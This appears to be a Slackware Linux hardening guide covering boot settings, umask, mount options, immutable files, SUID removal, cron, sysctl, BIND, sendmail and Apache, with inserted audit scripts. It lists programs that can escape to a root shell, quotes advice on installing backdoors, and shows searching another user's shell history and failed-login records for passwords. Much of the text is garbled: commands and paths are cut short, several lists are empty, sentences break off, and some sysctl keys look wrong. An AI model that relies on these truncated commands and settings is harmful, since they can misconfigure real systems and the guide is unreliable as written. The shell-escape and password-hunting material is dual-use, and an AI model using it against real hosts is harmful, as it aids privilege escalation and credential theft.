    Add "-a" to the following line in /etc/inittab to use
    /etc/shutdown.allow:

    ca::ctrlaltdel:/sbin/shutdown -t5 -r now -a

    root@darkstar:~# telinit q

    I like to use dumb terminals. Uncomment the following line in
    /etc/inittab:

    s1:12345:respawn:/sbin/agetty -L ttyS0 9600 vt100

    root@darkstar:~# telinit q

    man init
    man inittab
    man initscript
    man shutdown
    man telinit


    man shutdown

    In /etc/securetty (the ttys root may log in on), make sure only the
    following are uncommented:


    man securetty

    There are several ways to set umask:
            UMASK       077         (in /etc/login.defs)
            * K077                  (in /etc/limits)
            umask 077               (in /etc/profile or a user's shell rc)

    Umask controls what the initial permissions are for newly created files and
    directories. With a umask of 022, new files have the permissions of 644
    and new directories have the permissions of 755. Setting the umask to 077
    will result in new files being created with the permissions of 600 and new
    directories will have the permissions of 700.

    Using the umask of 077 will keep others from being able to access users'
    files. Using a umask of 022 will allow others access to the users' files
    unless the user takes the time to change the permissions. You can use
    cron to periodically remove permissions from the users' home directories.

    Setting a restrictive umask can cause problems when you commonly edit
    or create files that need to be readable by everyone. An example of
    files that everyone needs to be able to read are web server pages
    located in /var/www/htdocs.

    dentonj@darkstar:~$ type -a umask     
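    As an added example (not from the original page), the script below
    creates a throw-away file and directory under a given umask and reports
    the resulting octal modes, which is a quicker check than working out the
    bits by hand. mode_under_umask and perm_to_octal are names chosen for
    this example; it only writes under a mktemp directory and removes it
    again.

```shell
#!/bin/sh
# Added example, not from the original page: show the permissions that a
# given umask actually produces, by creating a throw-away file or directory
# under that umask in a temporary directory. Nothing system-wide is touched.

# perm_to_octal <rwxrwxrwx>: convert a 9-character ls(1) mode string to octal.
perm_to_octal() {
    s=$1
    out=""
    for i in 1 4 7; do
        t=$(echo "$s" | cut -c"$i"-"$((i + 2))")
        n=0
        case $t in r??) n=$((n + 4)) ;; esac
        case $t in ?w?) n=$((n + 2)) ;; esac
        case $t in ??x) n=$((n + 1)) ;; esac
        out="$out$n"
    done
    echo "$out"
}

# mode_under_umask <umask> <file|dir>: prints the octal mode a new file or
# directory gets when created with that umask (e.g. 077 file -> 600).
mode_under_umask() {
    d=$(mktemp -d)
    ( umask "$1"
      if [ "$2" = dir ]; then mkdir "$d/new"; else : > "$d/new"; fi )
    # ls -ld is portable; columns 2-10 are the nine permission characters.
    perms=$(ls -ld "$d/new" | cut -c2-10)
    rm -rf "$d"
    perm_to_octal "$perms"
}

# Demo: the two umasks discussed on the page, for files and directories.
for u in 022 077; do
    echo "umask $u: file $(mode_under_umask "$u" file), dir $(mode_under_umask "$u" dir)"
done
```

    The demo reports 644/755 for umask 022 and 600/700 for umask 077, the
    same numbers the text above gives; try 027 to see the group-readable
    middle ground (640/750).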

    man bash
    man umask
    man login.defs
    man limits

----[ Filesystem ]----

    In /etc/fstab:

    /dev/hdb1   swap            swap   defaults                         0 0
    /dev/hdb5   /               ext3   defaults                         1 1
    /dev/hdb6   /var            ext3   rw,nosuid,nodev                  0 2
    /dev/hdb7   /tmp            ext3   rw,nosuid,nodev,noexec           0 2
    /dev/hdb8   /usr            ext3   ro                               0 2
    /dev/hdb9   /home           ext3   rw,nosuid,nodev                  0 0
    /dev/hda1   /mnt/windows    vfat   rw,nosuid,nodev,noexec,noauto    0 0
    /dev/hda2   /mnt/slack      ext2   rw,noauto                        0 0
    /dev/cdrom  /mnt/cdrom      auto   noauto,owner,ro                  0 0
    /dev/fd0    /mnt/floppy     auto   noauto,owner                     0 0
    devpts      /dev/pts        devpts gid=5,mode=620                   0 0
    proc        /proc           proc   defaults                         0 0

    Mounting /usr read-only means remounting it read-write
    ("mount -o remount,rw /usr") before installing or upgrading packages.

    root@darkstar:~# mkdir /mnt/windows
    root@darkstar:~# mkdir /mnt/slack
    root@darkstar:~# mkdir /mnt/floppy
    root@darkstar:~# mkdir /mnt/thumb

    man fstab
    man nfs
    man mount

    I used to add "noexec" to /home, but that mount option is pretty trivial to
    bypass. Besides, I like having a ~/bin directory for my scripts.

    dentonj@darkstar:~$ /lib/ ./some_executable
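    The mount options above are easy to lose when /etc/fstab is edited later. The
    script below is an added example, not part of the original document: it checks
    an fstab file against the options the layout above depends on. The required
    option table (derived from the fstab shown) and the file argument are assumptions.

```shell
#!/bin/sh
# Added example (not part of the original document): check an fstab against
# the mount options the layout above relies on. The required options per
# mount point are read off the fstab shown (/tmp: nosuid,nodev,noexec;
# /var and /home: nosuid,nodev; /usr: ro). The fstab path is a parameter so
# that a constructed copy can be checked as well as the live /etc/fstab.

# has_opt OPTIONS OPT: true if the comma-separated OPTIONS field contains OPT
has_opt() {
    case ",$1," in
        *",$2,"*) return 0 ;;
    esac
    return 1
}

# required_opts MOUNTPOINT: prints the options this layout requires there
required_opts() {
    case $1 in
        /tmp)       echo "nosuid nodev noexec" ;;
        /var|/home) echo "nosuid nodev" ;;   # noexec on /home is trivial to bypass, so not required
        /usr)       echo "ro" ;;
        *)          echo "" ;;
    esac
}

# check_fstab FILE: prints "<mountpoint> missing <option>" for every gap and
# returns 1 if anything is missing, 0 if the file matches the layout
check_fstab() {
    findings=$(
        grep -v '^[[:space:]]*#' "$1" |
        while read -r dev mnt fstype opts rest; do
            [ -n "$mnt" ] || continue           # blank line
            for want in $(required_opts "$mnt"); do
                has_opt "$opts" "$want" || echo "$mnt missing $want"
            done
        done
    )
    [ -z "$findings" ] && return 0
    printf '%s\n' "$findings"
    return 1
}

# On a live Slackware box:  check_fstab /etc/fstab
```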


    Stop fsck from running every 22 boots. The new setting means fsck only
    runs every 6 months. If you would like to fsck more often, then adjust
    as necessary.

    root@darkstar:~# tune2fs -l /dev/hdb5
    root@darkstar:~# for i in hdb5 hdb6 hdb7 hdb8 hdb9; do
    > tune2fs -c 0 /dev/$i
    > done
    root@darkstar:~# tune2fs -l /dev/hdb5

    man tune2fs
    man fsck

    Make these files immutable:

        for i in `ls /etc/rc.d`; do
            chattr +i /etc/rc.d/$i
        done
        for i in `ls /etc/apache`; do
            chattr +i /etc/apache/$i
        done
        for i in `ls /etc/mail`; do
            chattr +i /etc/mail/$i
        done

        find / -type f \( -perm -4000 -o -perm -2000 \) -exec chattr +i {} \;

        chattr +i /etc/at.deny
        chattr +i /etc/exports
        chattr +i /etc/ftpusers
        chattr +i /etc/host.conf
        chattr +i /etc/hosts
        chattr +i /etc/hosts.allow
        chattr +i /etc/hosts.deny
        chattr +i /etc/hosts.equiv
        chattr +i /etc/hosts.lpd
        chattr +i /etc/inetd.conf
        chattr +i /etc/inittab
        chattr +i /etc/lilo.conf
        chattr +i /etc/login.access
        chattr +i /etc/login.defs
        chattr +i /etc/named.conf
        chattr +i /etc/porttime
        chattr +i /etc/profile
        chattr +i /etc/protocols
        chattr +i /etc/securetty
        chattr +i /etc/services
        chattr +i /etc/suauth
        chattr +i /home/dentonj/.forward
        chattr +i /home/dentonj/.netrc
        chattr +i /home/dentonj/.rhosts
        chattr +i /home/dentonj/.shosts

        less /usr/local/sbin/chkrootkit
        /TROJAN                 <-- type this to search for the TROJAN variable
        chattr +i <the commands listed in the variable TROJAN>

    This list should be much longer.

    root@darkstar:~# chmod go-rwx /usr/bin/chattr /usr/bin/lsattr     

    man chattr

    TODO - list where it can be found and how to compile it.

    Remove the CAP_LINUX_IMMUTABLE kernel capability. This prevents the +i
    attribute from being removed. I run `lcap` from rc.local. This file is
    sourced from the file rc.M. To remove the +i attribute from a file, you'll
    have to reboot the system and go into single user mode. This is one of the
    few times when you really have to reboot Linux.

    If you only access and manage the system remotely, using lcap may cause

    Note: Do this after you are finished with configuring your system.

        /usr/local/sbin/lcap CAP_LINUX_IMMUTABLE

    root@darkstar:~# touch /tmp/test
    root@darkstar:~# chattr +i /tmp/test
    root@darkstar:~# lsattr /tmp/test
    ----i-------- /tmp/test
    root@darkstar:~# cd
    root@darkstar:~# lcap CAP_LINUX_IMMUTABLE
    root@darkstar:~# chattr -i /tmp/test
    chattr: Operation not permitted while setting flags on /tmp/test
    root@darkstar:~# lcap
    Current capabilities: 0xFFFFFCFF

       0) *CAP_CHOWN                   1) *CAP_DAC_OVERRIDE         
       2) *CAP_DAC_READ_SEARCH         3) *CAP_FOWNER               
       4) *CAP_FSETID                  5) *CAP_KILL                 
       6) *CAP_SETGID                  7) *CAP_SETUID               
       8)  CAP_SETPCAP                 9)  CAP_LINUX_IMMUTABLE      
      10) *CAP_NET_BIND_SERVICE       11) *CAP_NET_BROADCAST        
      12) *CAP_NET_ADMIN              13) *CAP_NET_RAW              
      14) *CAP_IPC_LOCK               15) *CAP_IPC_OWNER            
      16) *CAP_SYS_MODULE             17) *CAP_SYS_RAWIO            
      18) *CAP_SYS_CHROOT             19) *CAP_SYS_PTRACE           
      20) *CAP_SYS_PACCT              21) *CAP_SYS_ADMIN            
      22) *CAP_SYS_BOOT               23) *CAP_SYS_NICE             
      24) *CAP_SYS_RESOURCE           25) *CAP_SYS_TIME             
      26) *CAP_SYS_TTY_CONFIG       
        * = Capabilities currently allowed

    root@darkstar:~# chmod -R go-rwx /etc/cron.

    The system startup scripts are world readable by default.

    root@darkstar:~# chmod -R go-rwx /etc/rc.d/

    Limit access to $HOME directories:

    root@darkstar:~# chmod -R go-rwx /home/dentonj
    root@darkstar:~# chmod -R go-rwx /root

    man chmod

    Limit access to logs:

    root@darkstar:~# chmod -R o-rwx /var/log

The following files should be empty if they exist:

Files that normally shouldn't exist:

Find SUID/SGID files and directories:
    root@darkstar:~# find / -type f \( -perm -4000 -o -perm -2000 \) \
    > -ls > suid_files.out
    root@darkstar:~# find / -type d \( -perm -4000 -o -perm -2000 \) \
    > -ls > suid_dirs.out

Find world and group writable files and directories:
    root@darkstar:~# find / -type f \( -perm -2 -o -perm -20 \) \
    > -ls > write_files.out
    root@darkstar:~# find / -type d \( -perm -2 -o -perm -20 \) \
    > -ls > write_dirs.out

    Remove the SUID or SGID bit from the following files:

        chmod u-s /usr/bin/at
        chmod u-s /usr/bin/chage
        chmod u-s /usr/bin/chfn
        chmod u-s /usr/bin/chsh
        chmod u-s /usr/bin/crontab
        chmod u-s /usr/bin/expiry
        chmod u-s /usr/bin/gpasswd
        chmod u-s /usr/bin/lppasswd
        chmod u-s /usr/bin/newgrp
        chmod u-s /usr/bin/rcp
        chmod u-s /usr/bin/rlogin
        chmod u-s /usr/bin/rsh
        chmod u-s /usr/libexec/ssh-keysign

    man chmod

Shell Escapes:
    The following is a list of programs that can escape to a shell. This can
    either be done by directly starting a new shell, executing shell commands
    (which can be used to start a shell), or by opening a text editor that can
    be used to start a shell.

    These programs are not a security concern by themselves. However, if they
    are set SUID root or used with sudo, the programs can allow users access to
    a root shell.

        dentonj ALL = (ALL) /usr/bin/less /var/log/messages

    Start a new shell:
        dentonj@darkstar:~$ sudo /usr/bin/less /var/log/messages
        <contents of /var/log/messages>
    Open an editor that can start a new shell:
        dentonj@darkstar:~$ sudo /usr/bin/less /var/log/messages
        <contents of /var/log/messages>

    Make sure none of these are SUID root. Also make sure they don't end up in
    /etc/sudoers. This list is not complete.

        /bin/ed                         /bin/more
        /usr/bin/bzmore                 /usr/bin/crontab -e
        /usr/bin/cscope                 /usr/bin/cu
        /usr/bin/cvs -e                 /usr/bin/cvsbug
        /usr/bin/elm                    /usr/bin/elvis
        /usr/bin/ex                     /usr/bin/flea
        /usr/bin/gccbug                 /usr/bin/gdb
        /usr/bin/less                   /usr/bin/lftp
        /usr/bin/mailto                 /usr/bin/mc
        /usr/bin/mcedit                 /usr/bin/mcview
        /usr/bin/mutt                   /usr/bin/mysql
        /usr/bin/mysqlbug               /usr/bin/nail
        /usr/bin/ncftp                  /usr/bin/newspost
        /usr/bin/nn                     /usr/bin/perlbug
        /usr/bin/pilot                  /usr/bin/pine
        /usr/bin/pg                     /usr/bin/rpcclient
        /usr/bin/sdiff                  /usr/bin/slrn
        /usr/bin/smbclient              /usr/bin/tin
        /usr/bin/trn                    /usr/bin/uupick
        /usr/bin/vim                    /usr/bin/zmore

    A couple of the things that I used to figure out which commands allow shell

    root@darkstar:~# cd /usr/bin && for i in `ls | grep -v "@$"`; do
    > echo "     $i"
    > strings $i | grep -E "VISUAL|EDITOR"
    > done | less
    root@darkstar:~# cd /usr/man/man1 && zgrep -E \
    > "\!.command|execute.command" *
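    An added example, not from the original document, that automates the check
    described above: it walks the shell-escape list and reports any of those
    programs that are SUID or SGID, or that are referenced as a command in a
    sudoers file. The PREFIX argument (so it can run against a constructed tree)
    and the sample files in the comments are assumptions.

```shell
#!/bin/sh
# Added example (not from the original document): audit the shell-escape
# list above. For each listed program it reports whether the binary is SUID
# or SGID and whether it appears as a command in a sudoers file. PREFIX is
# prepended to every path ("" on a live system) so a constructed tree can be
# checked; SUDOERS is the sudoers file to scan.

# the programs listed above (options such as "-e" are not part of the path)
ESCAPES="/bin/ed /bin/more /usr/bin/bzmore /usr/bin/crontab /usr/bin/cscope
/usr/bin/cu /usr/bin/cvs /usr/bin/cvsbug /usr/bin/elm /usr/bin/elvis
/usr/bin/ex /usr/bin/flea /usr/bin/gccbug /usr/bin/gdb /usr/bin/less
/usr/bin/lftp /usr/bin/mailto /usr/bin/mc /usr/bin/mcedit /usr/bin/mcview
/usr/bin/mutt /usr/bin/mysql /usr/bin/mysqlbug /usr/bin/nail /usr/bin/ncftp
/usr/bin/newspost /usr/bin/nn /usr/bin/perlbug /usr/bin/pilot /usr/bin/pine
/usr/bin/pg /usr/bin/rpcclient /usr/bin/sdiff /usr/bin/slrn
/usr/bin/smbclient /usr/bin/tin /usr/bin/trn /usr/bin/uupick /usr/bin/vim
/usr/bin/zmore"

# in_sudoers SUDOERS PATH: true if PATH appears as a whole word on a
# non-comment line of SUDOERS (a missing file counts as "not referenced")
in_sudoers() {
    grep -v '^[[:space:]]*#' "$1" 2>/dev/null |
        grep -qE "(^|[[:space:],=])$2([[:space:],]|$)"
}

# audit_shell_escapes PREFIX SUDOERS: prints one finding per line,
# "SUID <file>", "SGID <file>" or "SUDOERS <path>"; returns 1 if any found
audit_shell_escapes() {
    prefix=$1 sudoers=$2
    found=0
    for p in $ESCAPES; do
        f="$prefix$p"
        if [ -e "$f" ]; then
            if [ -u "$f" ]; then echo "SUID $f"; found=1; fi
            if [ -g "$f" ]; then echo "SGID $f"; found=1; fi
        fi
        if in_sudoers "$sudoers" "$p"; then echo "SUDOERS $p"; found=1; fi
    done
    return $found
}

# On a live system:  audit_shell_escapes "" /etc/sudoers
```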

Find and delete dead symlinks:
    find / -type l -print | perl -nle '-e || print'

----[ Network ]----

    # Stop arp spoofing used to sniff switched networks
    # Set a static ARP entry for the default gateway
    arp -s 00:00:FE:ED:FA:CE

    # Set a static ARP entry for the log host
    arp -s 00:00:DE:AD:BE:EF

    The file /etc/rc.d/rc.inet2 checks for the existence of rc.firewall and
    then runs it. Create a firewall script and place it there.

----[ Cron ]----

    /usr/sbin/ntpdate && /sbin/hwclock --systohc

    root@darkstar:~# chmod 700 /etc/cron.daily/ntpdate

    /usr/bin/find / -type f -name core -exec /bin/rm -f {} \;
    /usr/bin/find /tmp -atime +7 -exec /bin/rm -f {} \;
    /usr/bin/find /var/tmp -atime +7 -exec /bin/rm -f {} \;

    root@darkstar:~# chmod 700 /etc/cron.daily/cleanup

    /bin/chmod -R go-rwx /home/dentonj
    /bin/chmod -R go-rwx /root
    /bin/chmod -R o-rwx /var/log
    /bin/rm -f /home/dentonj/dead.letter

    root@darkstar:~# chmod 700 /etc/cron.daily/paranoid

    0 3 * * * /usr/bin/find /home \( -name .rhosts -o -name .forward \) -ls

    Cron should mail the results to root.

    root@darkstar:~# crontab -l
    root@darkstar:~# crontab -e

    man crond
    man crontab

    root@darkstar:~# rm /etc/at.deny
    root@darkstar:~# touch /etc/at.allow

    Don't allow anyone to use at.

    Even better, remove at from the system:

    root@darkstar:~# removepkg at

    man at

----[ Bash ]----

    Set the history file so that it can only be appended to and not erased by a
    user.

    root@darkstar:~# chattr +a /home/dentonj/.bash_history
    root@darkstar:~# chmod go-rwx /usr/bin/chattr /usr/bin/lsattr

    man chattr
    man lsattr
    man chmod

    trap 'test -n "$SSH_AGENT_PID" && eval `/usr/bin/ssh-agent -k`' 0

----[ Kernel ]----

    # Improve file system performance
    vm.bdflush = 60 64 64 256 500 300 80 0 0

    # Increase swap bandwidth system performance
    vm.kswapd = 512 32 32

    # Enables/Disables memory over commitment
    vm.overcommit_memory = 0

    # Increases number of page tables keeps in a per-processor cache
    vm.pagetable_cache = 25 50

    # Increase limit of file-handles
    fs.file-max = 8192

    # Enable/Disable ignoring ping request
    net.ipv4.icmp_echo_ignore_all = 1

    # Enable/Disable ignoring broadcasts request
    net.ipv4.icmp_ignore_broadcasts = 1

    # Enable/Disable IP source routing
    net.ipv4.conf.all.accept_source_route = 0
    net.ipv4.conf.default.accept_source_route = 0

    # Enable/Disable TCP SYN cookie protection
    net.ipv4.tcp_syncookies = 1

    # Enable/Disable ICMP redirect acceptance
    net.ipv4.conf.all.accept_redirects = 0
    net.ipv4.conf.default.accept_redirects = 0

    # Enable/Disable bad error message protection
    net.ipv4.icmp_ignore_bogus_error_responses = 1

    # Enable/Disable IP spoofing protection
    net.ipv4.conf.all.rp_filter = 2
    net.ipv4.conf.default.rp_filter = 2

    # Enable/Disable log spoofed, source routed, redirect packets
    net.ipv4.conf.all.log_martians = 1
    net.ipv4.conf.default.log_martians = 1

    # Improve shared memory size
    kernel.shmall = 134217728
    kernel.shmmax = 134217728

    # Improve default and maximum socket buffer sizes
    # (net.core.vmem_* does not exist; the receive/send buffer keys are rmem/wmem)
    net.core.rmem_max = 2048000
    net.core.wmem_max = 2048000
    net.core.rmem_default = 204800
    net.core.wmem_default = 204800

    # Enable/Disable packet forwarding
    net.ipv4.ip_forward = 0

    # Change the default TTL to help obscure OS fingerprinting
    net.ipv4.ip_default_ttl = 128

    root@darkstar:~# sysctl -p /etc/sysctl.conf
    root@darkstar:~# sysctl -A

    There is already an entry in /etc/rc.d/rc.S that will apply the
    sysctl settings located in this file during bootup.

    man sysctl
    man sysctl.conf     

    List the kernel modules that are loaded during bootup. Comment out the
    ones you feel are unnecessary.

    root@darkstar:~# grep -v "^#\|^$" /etc/rc.d/rc.modules



Remove support for kernel modules:
    From Phrack 25-5, "Unix Cracking Tips":
        "After you gain superuser privileges and you wish to stay root,
        here are a few suggestions for installing backdoors:
        . . .
        - Install new system calls
        . . ."

    Then read Phrack 52-8, "Weakening the Linux Kernel". Then compile your
    kernel to remove support for modules.


----[ Misc Stuff ]----

    set bell-style none
    set mark-directories on
    set mark-modified-lines on
    set match-hidden-files on
    set show-all-if-ambiguous on
    set visible-stats on

    man bash
    man readline

Stuff to remove:
    root@darkstar:~# removepkg nn
    root@darkstar:~# removepkg slrn
    root@darkstar:~# removepkg uucp
    root@darkstar:~# removepkg strace
    root@darkstar:~# removepkg gdb
    root@darkstar:~# removepkg nc
    root@darkstar:~# removepkg nmap
    root@darkstar:~# removepkg at

    This list should be much longer.

    # This is hard drive specific, your settings will vary
    /usr/sbin/hdparm -c3 -a16 -W1 -u1 /dev/hdb

    # Turn on NumLock
    /usr/bin/setleds -D +num

Make a backup of commonly trojaned commands:
    Only do this after a fresh install. Making copies of already trojaned
    commands will just ruin your day. If you don't have a fresh install, copy
    the commands from the "Live" CD that comes with the official version of

    root@darkstar:~# mkdir bin
    Copy the following to /root/bin:
        /bin/date                       /bin/du
        /bin/echo                       /bin/grep
        /bin/kill                       /bin/killall
        /bin/login                      /bin/ls
        /bin/netstat                    /bin/ps
        /bin/su                         /bin/tar
        /sbin/agetty                    /sbin/explodepkg
        /sbin/getty                     /sbin/ifconfig
        /sbin/installpkg                /sbin/makepkg
        /sbin/pidof                     /sbin/removepkg
        /sbin/upgradepkg                /usr/bin/basename
        /usr/bin/biff                   /usr/bin/chfn
        /usr/bin/chsh                   /usr/bin/crontab
        /usr/bin/dirname                /usr/bin/env
        /usr/bin/find                   /usr/bin/lsattr
        /usr/bin/nail                   /usr/bin/passwd
        /usr/bin/pstree                 /usr/bin/ssh
        /usr/bin/top                    /usr/bin/traceroute
        /usr/bin/write                  /usr/sbin/gpm
        /usr/sbin/hdparm                /usr/sbin/in.fingerd
        /usr/sbin/in.identd             /usr/sbin/in.rlogind
        /usr/sbin/in.rshd               /usr/sbin/in.telnetd
        /usr/sbin/in.timed              /usr/sbin/inetd
        /usr/sbin/ipop3d                /usr/sbin/named
        /usr/sbin/rpcinfo               /usr/sbin/sendmail
        /usr/sbin/sshd                  /usr/sbin/syslogd
        /usr/sbin/tcpd

    root@darkstar:~# cd bin
    root@darkstar:~/bin# md5sum * >> md5sum
    root@darkstar:~/bin# cd
    root@darkstar:~# tar zcvf bin.tar.gz ./bin
    root@darkstar:~# cp bin.tar.gz /mnt/thumb

    It would be a good idea to run `chattr +i ...` on all of the original files.
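    The md5sum list above is keyed by basename, so it can only verify the copies
    in /root/bin. The following is an added example, not part of the original
    document: it records each hash under the command's live path so the installed
    binaries can be checked in place later. PREFIX, the list file and the MANIFEST
    name are assumptions.

```shell
#!/bin/sh
# Added example (not from the original document): record the hashes of the
# commonly trojaned commands under their live paths so the installed
# binaries can be verified in place later, not just the copies in /root/bin.
# PREFIX is prepended to every path ("" on a live system) so the functions
# can be exercised on a constructed tree; LISTFILE names one path per line.

# backup_commands PREFIX DEST LISTFILE: copy each listed command into DEST
# and append "<md5>  <path>" for the ORIGINAL to DEST/MANIFEST (md5sum -c format)
backup_commands() {
    prefix=$1 dest=$2 list=$3
    mkdir -p "$dest"
    : > "$dest/MANIFEST"
    while read -r p; do
        [ -n "$p" ] || continue
        cp -p "$prefix$p" "$dest/"               # the clean copy, as on the page
        md5sum "$prefix$p" >> "$dest/MANIFEST"   # hash keyed by the live path
    done < "$list"
}

# verify_commands MANIFEST: print every path whose live binary no longer
# matches the recorded hash (or is missing); returns 1 if any differ, 0 if all match
verify_commands() {
    changed=$(md5sum -c --quiet "$1" 2>/dev/null | sed -n 's/: FAILED.*$//p')
    [ -z "$changed" ] && return 0
    printf '%s\n' "$changed"
    return 1
}

# On a live system, with the page's list in /root/trojaned.list, one path per line:
#   backup_commands "" /root/bin /root/trojaned.list
#   verify_commands /root/bin/MANIFEST     # e.g. daily from cron, mailed to root
```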

Passwords in logs and history files:
    It's not uncommon for someone to make a mistake while logging in or 
    switching users and type the password in the wrong place.  Be aware that 
    "dumpster diving" in system logs and other users history files is a common 
    practice by evil doers to obtain passwords.  Keep this in mind when 
    deciding to store 6 months worth of logs or when setting HISTFILESIZE to a 
    root@darkstar:~# lastb
    P@ssw0rd1!                             Fri Jun 23 19:04 - 19:04  (00:00)    
    dentonj                                Fri Jun 23 19:03 - 19:03  (00:00)    

    root@darkstar:~# less /home/dentonj/.bash_history
    <contents of .bash_history>
    /us                                 <-- type this to search for "us"
    . . .
    us -
    . . .

    Ignore the robots.txt file on web servers.
    robots = off

----[ Program Hardening ]----








    man afpd
    man afpd.conf
    man AppleVolumes.default
    man atalkd
    man atalkd.conf
    man netatalk.conf
    man papd



      acl "allowed" {
      };

      acl "denied" {
      };

      key "rndc-key" {
              algorithm hmac-md5;
              secret "Thisisafakekey==";
      };

      controls {
              inet port 953
                   allow {; } keys { "rndc-key"; };
      };

      options {
              directory "/var/named";
              allow-transfer { none; };
              allow-query { allowed; };
              allow-recursion { allowed; };
              blackhole { denied; };
              tcp-clients 32;
              forwarders {;; };
              version "Not available";
      };

      logging {
              category lame-servers { null; };
      };

      zone "." IN {
              type hint;
              file "caching-example/";
      };

      zone "localhost" IN {
              type master;
              file "caching-example/named.local";
              allow-update { none; };
              notify no;
      };

      zone "" IN {
              type master;
              file "caching-example/named.local";
              allow-update { none; };
              notify no;
      };

      key "rndc-key" {
              algorithm hmac-md5;
              secret "Thisisafakekey==";
      };

      options {
              default-key "rndc-key";
              default-port 953;
      };

    To generate the keys for rndc:

    root@darkstar:~# rndc-confgen -b 512
    To check the configuration:

    root@darkstar:~# named-checkconf -z
    zone localhost/IN: loaded serial 42
    zone loaded serial 1997022700
    root@darkstar:~# named-checkzone localhost \
    zone localhost/IN: loaded serial 42
    root@darkstar:~# named-checkzone \
    zone loaded serial 1997022700
    root@darkstar:~# named-checkzone . /var/named/caching-example/
    zone ./IN: has 0 SOA records

    root@darkstar:~# chmod 700 /etc/rc.d/rc.bind
    root@darkstar:~# /etc/rc.d/rc.bind start
    root@darkstar:~# rndc status

    man named
    man named-checkconf
    man named-checkzone
    man rndc
    man rndc.conf
    man rndc-confgen
    man lwresd

    TODO - Chroot



        #O DontBlameSendmail=Safe
        O MaxHopCount=25
        O HelpFile=/etc/
        O ForwardPath=/etc/forward
        O LogLevel=15
        #O DaemonPortOptions=Name=MTA
        #O DaemonPortOptions=Port=587,Name=MSA,M=E
        O DaemonPortOptions=Address=
        O ClientPortOptions=Family=inet,Address=
        O PrivacyOptions=goaway,noreceipts,restrictmailq,restrictqrun,
        O Timeout.ident=0  
        O SmtpGreetingMessage=$j Unauthorized Access Prohibited.
        O AllowBogusHELO=False
        O UnsafeGroupWrites=True
        O RrtImpliesDSN=False
        $.by $j with id $i$?{tls_version}

    root@darkstar:~# touch /etc/forward


        The .forward file allows users to easily forward email.  However, the 
        file can also be used to run a program every time an email is received.
        There are several ways to disable use of the .forward file.
        Set the ForwardPath option so that it points to something other than 
        the default.  The option has to be set to something, otherwise sendmail
        sets ForwardPath to $HOME/.forward.
            O ForwardPath=/etc/forward
        You can allow programs to be run, but restrict which ones can be run by
        using smrsh.
        You can disable forwarding in sendmail all together.  However, the bat 
        book warns that Bad Things(TM) can happen if you completely disable 
        forwarding.  Remove the "w" flag from the line located in 
        Mlocal,         P=/usr/bin/procmail, F=lsDFMAw5:/|@qSPfhn9, S=.....
        Mlocal,         P=/usr/bin/procmail, F=lsDFMA5:/|@qSPfhn9, S=.....
        You can try to have root create and own the .forward file in each of 
        the user's home directories.  But the user can move the .forward file 
        and create a new file.
        root@darkstar:~# touch /home/dentonj/.forward
        dentonj@darkstar:~$ ls -l .forward
        -rw-r--r--  1 root root 0 2001-06-27 20:17 .forward
        dentonj@darkstar:~$ mv .forward .forward.moved
        dentonj@darkstar:~$ ls -l .forward.moved
        -rw-r--r--  1 root root 0 2001-06-27 20:17 .forward.moved
        However, making the file immutable stops this.
        root@darkstar:~# touch /home/dentonj/.forward
        root@darkstar:~# chattr +i /home/dentonj/.forward
        root@darkstar:~# lsattr /home/dentonj/.forward
        ----i-------- /home/dentonj/.forward
        root@darkstar:~# chmod go-rwx /usr/bin/chattr /usr/bin/lsattr
        dentonj@darkstar:~$ ls -l .forward
        -rw-r--r--  1 root root 0 2001-06-27 20:19 .forward
        dentonj@darkstar:~$ mv .forward .forward.moved
        mv: cannot move `.forward' to `.forward.moved': Operation not permitted




        I used to comment out most of these.  Now I'm more interested in whether
        someone actually tries to send email to any of them.
        postmaster:     root, dentonj
        bin:            root, dentonj
        daemon:         root, dentonj
        games:          root, dentonj
        ingres:         root, dentonj
        nobody:         root, dentonj
        system:         root, dentonj
        toor:           root, dentonj
        uucp:           root, dentonj
        manager:        root, dentonj
        dumper:         root, dentonj
        webmaster:      root, dentonj
        abuse:          root, dentonj
        decode:         root, dentonj
        Add any additional system accounts present in /etc/passwd:
        admin:          root, dentonj
        ftp:            root, dentonj
        mail:           root, dentonj
        mysql:          root, dentonj
        smmsp:          root, dentonj
        sshd:           root, dentonj
        root@darkstar:~# newaliases
        man aliases
        man newaliases

    If you only need to run sendmail for local mail, use cron.

    root@darkstar:~# /etc/rc.d/rc.sendmail stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.sendmail

        /usr/sbin/sendmail -q

    root@darkstar:~# chmod 700 /etc/cron.hourly/mqueue

    man crond


    root@darkstar:~# groupadd -g 80 http
    root@darkstar:~# useradd -u 80 -g 80 http


        #LoadModule includes_module     libexec/apache/
        #LoadModule autoindex_module    libexec/apache/
        #LoadModule speling_module      libexec/apache/
        #LoadModule userdir_module      libexec/apache/
        #LoadModule anon_auth_module    libexec/apache/
        #LoadModule digest_module       libexec/apache/
        #LoadModule proxy_module        libexec/apache/
        #LoadModule cern_meta_module    libexec/apache/
        #LoadModule usertrack_module    libexec/apache/
        #LoadModule unique_id_module    libexec/apache/
        #AddModule mod_includes.c
        #AddModule mod_autoindex.c
        #AddModule mod_speling.c
        #AddModule mod_userdir.c
        #AddModule mod_auth_anon.c
        #AddModule mod_digest.c
        #AddModule mod_proxy.c
        #AddModule mod_cern_meta.c
        #AddModule mod_usertrack.c
        #AddModule mod_unique_id.c
        User http
        Group http
        ServerAdmin root@localhost
        <Directory "/var/www/htdocs">
            Options FollowSymLinks MultiViews
        </Directory>
        UseCanonicalName Off
        LogLevel info
        LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T"
        CustomLog /var/log/apache/access_log combined
        ServerSignature Off
        ServerTokens ProductOnly
        <Directory "/var/www/icons">
            Options MultiViews
        </Directory>
        #Alias /manual/ "/var/www/htdocs/manual/"
        #<Directory "/var/www/htdocs/manual">
        #    Options Indexes FollowSymLinks MultiViews
        #    AllowOverride None
        #    Order allow,deny
        #    Allow from all
        #</Directory>
        #ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
        #<Directory "/var/www/cgi-bin">
        #    AllowOverride None
        #    Options None
        #    Order allow,deny
        #    Allow from all
        #</Directory>

        /var/log/apache/access_log /var/log/apache/error_log {
                create 0640 root root
                postrotate
                        /bin/kill -HUP `cat /var/run/ \
                        2> /dev/null || true`
                endscript
        }

    dentonj@darkstar:~$ links /var/www/htdocs/manual/misc/security_tips.html


    Fortunately, PHP is disabled by default. But if you insist on letting the
    script kiddies have free rein of your system, there are a few things you
    can do to slow them down.

        Include /etc/apache/mod_php.conf

        display_errors = Off
        log_errors = On
        error_log = /var/log/apache/php_errors
        register_globals = Off
